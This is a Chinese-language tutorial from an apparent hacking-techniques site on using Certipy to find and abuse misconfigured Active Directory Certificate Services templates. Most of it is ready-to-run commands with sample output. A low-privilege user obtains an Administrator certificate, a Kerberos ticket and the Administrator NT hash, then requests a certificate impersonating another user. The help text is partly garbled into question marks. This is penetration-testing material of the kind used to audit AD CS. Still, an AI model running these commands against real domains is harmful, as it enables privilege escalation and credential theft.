1. 主页 > 黑客技术

[web渗透]渗透测试流程,如何使用Certipy检测活动目录证书安全

[web渗透]之:渗透测试流程,如何使用Certipy检测活动目录证书安全

[web渗透]渗透测试流程,如何使用Certipy检测活动目录证书安全(图1)

关于Certipy

Certipy是一款基于Python开发的强大工具,该工具可以帮助广大研究人员枚举并利用活动目录证书服务(AD CS)中的错误配置项。

工具安装

广大研究人员可以使用下列命令将该项目源码克隆至本地:

git clone https://github.com/ly4k/Certipy.git

接下来,在命令行终端中切换至项目根目录,然后运行下列命令即可:

$ python3 setup.py install

别忘了将Python脚本目录添加至系统环境变量路径中。

工具使用

$ certipy -h

usage: certipy [-h] [-debug] [-target-ip ip address] [-nameserver nameserver] [-dns-tcp] [-hashes LMHASH:NTHASH] [-no-pass] [-k] [-dc-ip ip address]

???????????????target {find,req,auth,auto} ...

?

Active Directory certificate abuse

?

positional arguments:

??target ???????????????[[域名/]用户名[:密码]@]目标名称或地址>

??{find,req,auth,auto} ?操作

????find ???????????????查找证书模板

????req ????????????????请求一份新的证书

????auth ???????????????使用证书进行认证

????auto ???????????????自动利用证书实现提权

?

optional arguments:

??-h, --help ?????????????显示帮助信息

??-debug ???????????????开启调试模式输出

??-no-pass ?????????????不询问密码

??-k ???????????????????使用Kerberos认证。

??-dc-ip ip address ???????目标域控制器的IP地址

?

connection:

??-target-ip ip address

????????????????????????目标设备的IP地址

??-nameserver nameserver??用于DNS解析的域名服务器

??-dns-tcp ??????????????使用TCP代替UDP执行DNS查询

?

authentication:

??-hashes LMHASH:NTHASH

????????????????????????NTLM hashes, format is LMHASH:NTHASH

工具使用样例

自动化

在下面的使用样例中,用户john是一个低权限用户,可以注册Copy of Web Server模板:

$ certipy 'predator/john:Passw0rd@dc.predator.local' auto

[*] Trying template 'Copy of Web Server' with CA 'predator-DC-CA'

[*] Generating RSA key

[*] Requesting certificate

[*] Request success

[*] Got certificate with UPN 'Administrator'

[*] Saved certificate to '1.crt'

[*] Saved private key to '1.key'

[*] Using UPN: 'Administrator@predator'

[*] Trying to get TGT...

[*] Saved credential cache to 'Administrator.ccache'

[*] Trying to retrieve NT hash for 'Administrator@predator'

[*] Got NT hash for 'Administrator@predator': fc525c9683e8fe067095ba2ddc971889

默认情况下,工具会选择Administrator用户,我们也可以使用-user参数来为其他用户创建证书。

查找

find操作将帮助我们查找一个或多个CA启用了的证书模板。

查找漏洞模板

使用-vulnerable参数将搜索存在漏洞的证书模板:

$ certipy 'predator/john:Passw0rd@dc.predator.local' find -vulnerable

[*] Finding vulnerable certificate templates for 'john'

User

??Name ?????????????????????????????????: predator\john

??Groups ???????????????????????????????:

Certificate Authorities

??0

????CA Name ????????????????????????????: predator-DC-CA

????DNS Name ???????????????????????????: dc.predator.local

????Certificate Subject ????????????????: CN=predator-DC-CA, DC=predator, DC=local

????Certificate Serial Number ??????????: 1976D0FEFCAFC9A84D02D305FA88D84D

????Certificate Validity Start ?????????: 2021-10-06 11:32:01+00:00

????Certificate Validity End ???????????: 2026-10-06 11:42:01+00:00

????User Specified SAN ?????????????????: Disabled

????CA Permissions

??????Owner ????????????????????????????: BUILTIN\Administrator

??????Access Rights

????????ManageCertificates ?????????????: BUILTIN\Administrator

??????????????????????????????????????????predator\Domain Admins

??????????????????????????????????????????predator\Enterprise Admins

????????ManageCa ???????????????????????: BUILTIN\Administrator

??????????????????????????????????????????predator\Domain Admins

??????????????????????????????????????????predator\Enterprise Admins

????????Enroll ?????????????????????????: Authenticated Users

Vulnerable Certificate Templates

??0

????CAs ????????????????????????????????: predator-DC-CA

????Template Name ??????????????????????: Copy of Web Server

????Validity Period ????????????????????: 2 years

????Renewal Period ?????????????????????: 6 weeks

????Certificate Name Flag ??????????????: EnrolleeSuppliesSubject

????Enrollment Flag ????????????????????: None

????Authorized Signatures Required ?????: 0

????Extended Key Usage ?????????????????:

????Permissions

??????Enrollment Permissions

????????Enrollment Rights ??????????????: predator\Domain Admins

??????????????????????????????????????????predator\Enterprise Admins

??????????????????????????????????????????Authenticated Users

??????Object Control Permissions

????????Owner ??????????????????????????: predator\Administrator

????????Write Owner Principals ?????????: predator\Domain Admins

??????????????????????????????????????????predator\Enterprise Admins

??????????????????????????????????????????predator\Administrator

????????Write Dacl Principals ??????????: predator\Domain Admins

??????????????????????????????????????????predator\Enterprise Admins

??????????????????????????????????????????predator\Administrator

????????Write Property Principals ??????: predator\Domain Admins

??????????????????????????????????????????predator\Enterprise Admins

??????????????????????????????????????????predator\Administrator

????Vulnerable Reasons ?????????????????: 'Authenticated Users' can enroll, enrollee supplies subject and template allows authentication

??????????????????????????????????????????'Authenticated Users' can enroll and template has dangerous EKU

使用-user参数将查找指定用户相关的存在漏洞的证书模板,默认配置下使用的是当前用户。

查找所有模板

$ certipy 'predator/john:Passw0rd@dc.predator.local' find

[*] Finding certificate templates for 'john'

User

??Name ?????????????????????????????????: predator\john

??Groups ???????????????????????????????:

Certificate Authorities

??0

????CA Name ????????????????????????????: predator-DC-CA

????DNS Name ???????????????????????????: dc.predator.local

????Certificate Subject ????????????????: CN=predator-DC-CA, DC=predator, DC=local

????Certificate Serial Number ??????????: 1976D0FEFCAFC9A84D02D305FA88D84D

????Certificate Validity Start ?????????: 2021-10-06 11:32:01+00:00

????Certificate Validity End ???????????: 2026-10-06 11:42:01+00:00

????User Specified SAN ?????????????????: Disabled

????CA Permissions

??????Owner ????????????????????????????: BUILTIN\Administrator

??????Access Rights

????????ManageCertificates ?????????????: BUILTIN\Administrator

??????????????????????????????????????????predator\Domain Admins

??????????????????????????????????????????predator\Enterprise Admins

????????ManageCa ???????????????????????: BUILTIN\Administrator

??????????????????????????????????????????predator\Domain Admins

??????????????????????????????????????????predator\Enterprise Admins

????????Enroll ?????????????????????????: Authenticated Users

Certificate Templates

??0

????CAs ????????????????????????????????: predator-DC-CA

????Template Name ??????????????????????: User

????Validity Period ????????????????????: 1 year

????Renewal Period ?????????????????????: 6 weeks

????Certificate Name Flag ??????????????: SubjectRequireDirectoryPath

??????????????????????????????????????????SubjectRequireEmail

??????????????????????????????????????????SubjectAltRequireEmail

??????????????????????????????????????????SubjectAltRequireUpn

????Enrollment Flag ????????????????????: AutoEnrollment

??????????????????????????????????????????PublishToDs

??????????????????????????????????????????IncludeSymmetricAlgorithms

????Authorized Signatures Required ?????: 0

????Extended Key Usage ?????????????????: Encrypting File System

??????????????????????????????????????????Secure Email

??????????????????????????????????????????Client Authentication

????Permissions

??????Enrollment Permissions

????????Enrollment Rights ??????????????: predator\Domain Admins

??????????????????????????????????????????predator\Domain Users

??????????????????????????????????????????predator\Enterprise Admins

??????Object Control Permissions

????????Owner ??????????????????????????: predator\Enterprise Admins

????????Write Owner Principals ?????????: predator\Domain Admins

??????????????????????????????????????????predator\Enterprise Admins

????????Write Dacl Principals ??????????: predator\Domain Admins

??????????????????????????????????????????predator\Enterprise Admins

????????Write Property Principals ??????: predator\Domain Admins

??????????????????????????????????????????predator\Enterprise Admins

[...]

??11

????CAs ????????????????????????????????: predator-DC-CA

????Template Name ??????????????????????: Copy of Web Server

????Validity Period ????????????????????: 2 years

????Renewal Period ?????????????????????: 6 weeks

????Certificate Name Flag ??????????????: EnrolleeSuppliesSubject

????Enrollment Flag ????????????????????: None

????Authorized Signatures Required ?????: 0

????Extended Key Usage ?????????????????:

????Permissions

??????Enrollment Permissions

????????Enrollment Rights ??????????????: predator\Domain Admins

??????????????????????????????????????????predator\Enterprise Admins

??????????????????????????????????????????Authenticated Users

??????Object Control Permissions

????????Owner ??????????????????????????: predator\Administrator

????????Write Owner Principals ?????????: predator\Domain Admins

??????????????????????????????????????????predator\Enterprise Admins

??????????????????????????????????????????predator\Administrator

????????Write Dacl Principals ??????????: predator\Domain Admins

??????????????????????????????????????????predator\Enterprise Admins

??????????????????????????????????????????predator\Administrator

????????Write Property Principals ??????: predator\Domain Admins

??????????????????????????????????????????predator\Enterprise Admins

??????????????????????????????????????????predator\Administrator

查询请求

用户josh将会以用户jane的身份请求一个有效的身份认证证书,predator-DC-CA已启用了Copy of Web Server:

$ certipy 'predator/john:Passw0rd@dc.predator.local' req -template 'Copy of Web Server' -ca 'predator-DC-CA' -alt 'jane'

[*] Generating RSA key

[*] Requesting certificate

[*] Request success

[*] Got certificate with UPN 'jane'

[*] Saved certificate to '2.crt'

[*] Saved private key to '2.key'

以当前用户身份请求证书

$ certipy 'predator/john:Passw0rd@dc.predator.local' req -template 'User' -ca 'predator-DC-CA'

[*] Generating RSA key

[*] Requesting certificate

[*] Request success

[*] Got certificate with UPN 'john@predator.local'

[*] Saved certificate to '3.crt'

[*] Saved private key to '3.key'

身份认证

auth操作将会使用PKINIT Kerberos扩展来对提供的证书进行身份认证:

$ certipy 'predator/jane@dc.predator.local' auth -cert ./2.crt -key ./2.key

[*] Using UPN: 'jane@predator'

[*] Trying to get TGT...

[*] Saved credential cache to 'jane.ccache'

[*] Trying to retrieve NT hash for 'jane@predator'

[*] Got NT hash for 'jane@predator': 077cccc23f8ab7031726a3b70c694a49

项目地址

Certipy:GitHub传送门

参考资料

https://www.specterops.io/assets/resources/Certified_Pre-Owned.pdf

https://github.com/dirkjanm/PKINITtools

活动目录 AD安全

本文话题是[web渗透]渗透测试流程,如何使用Certipy检测活动目录证书安全

本文由黑帽达人官网发布,不代表黑帽达人官网立场,转载联系作者并注明出处:https://m.czlg.net/article/wangzhanseo/596.html